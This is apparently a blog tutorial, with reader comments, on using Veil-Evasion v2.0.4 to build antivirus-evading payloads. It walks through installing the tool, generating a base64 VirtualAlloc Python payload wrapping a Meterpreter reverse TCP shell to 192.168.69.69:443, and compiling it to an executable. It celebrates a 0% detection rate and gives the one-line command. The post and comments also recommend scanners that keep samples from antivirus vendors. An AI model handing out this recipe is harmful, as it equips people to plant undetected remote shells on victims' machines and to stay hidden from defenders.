- Bypass common AV solutions used.
- Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
- Try to create each payload as random as possible.
Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus.
The main changes in this version is:
- x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
- Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.
There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.
If you want to install Veil in your own environment you can use the commands below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip unzip master.zip cd Veil-master/setup cd .. ./setup.sh
If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update apt-get install veil
I had a bad experience with the second option and I prefer to install Veil with the first one using "setup.sh" script.
The veil's developers don't want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: "Do not distribute the sample".
When Veil is recently installed, just run it with the command below:
./Veil
By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type "use".
Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing "18"
When our payload is loaded type "generate". You can set some specifics options, but in this post, we are going to try the default options.
Now we are going to select msfvenom typing "1"
After that we need to type some details:
- Enter metasploit payload: "windows/meterpreter/reverse_tcp"
- Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
- Enter value for 'LPORT': "443"
Then it's necessary to wait while the shellcode is been generated.
You need to press enter and then Veil requests us the name of our payload. In this case "undetectable"
We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"
In the end, we can get our executable at "/root/Veil-master/output/compiled/"
Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check "Do not distribute the sample". If you choose to don't check this options or you decide to submit the executable to www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.
You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!
If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.
./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443
Clearly you can't read the instructions within Veil that say "And don't submit samples to any online scanner! ;)"
ReplyDeleteYeah... But the developer advice us to use http://vscan.novirusthanks.org/ In this site you are able to don't share the file with the antivirus vendors...
Deletevscan.novirusthanks.org no longer works!
ReplyDeleteAny other places that "Don't submit" to AV's?
use nodistribute.com, if thats the wrong URL just google nodistribute virus scanner.
ReplyDeleteAnyway doesn't matter. You make the payload undetectable but once you try to run commands on the victim the antivirus pops up
ReplyDeleteThanks, very helpful, testing it now on update mcfee so let's see
ReplyDelete